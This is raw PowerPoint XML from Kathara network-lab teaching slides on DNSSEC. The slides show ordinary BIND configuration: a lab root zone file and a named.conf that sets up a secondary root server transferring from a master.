            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.  IN      A       100.0.75.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9540DB5D-D8A5-A33E-0B10-5CB03AD1F0F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDC9E71-2E13-53B5-C1A6-8F1861141E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B740F0-507E-DC5C-FCD5-4D3008F0368F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4819E164-C45C-D3E4-E9C7-678E61AEC57C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271702412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E5BA14-6627-AF99-AB32-AB816D0E9AD8}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D58F86-B949-0B9D-A502-C6E4FCC841E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA87239-C914-0D40-B367-D12141508C63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1122"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:br>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> slave;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/var/cache/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root.transfered</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    masters { 10.0.3.5; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9EB5D-CC7F-6F6A-CCA8-6E5216B42FA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3760C5B0-75F1-A8A2-687B-465AA12A2667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C46EB18-6265-13AC-CED9-95C4E7DAEF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04382130-8DE6-78F8-F612-BAF80C08674E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B7CA58-CA4E-84D5-5427-7A195617470A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7433954" y="1640928"/>
            <a:ext cx="4393121" cy="702151"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -122980"/>
              <a:gd name="adj2" fmla="val 222299"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This server is a Secondary (Slave), copy everything from the Master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060FFC04-7A0D-83F4-61F5-1C4C89A45255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8989621" y="3224848"/>
            <a:ext cx="3077998" cy="1249873"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80590"/>
              <a:gd name="adj2" fmla="val 3678"/>
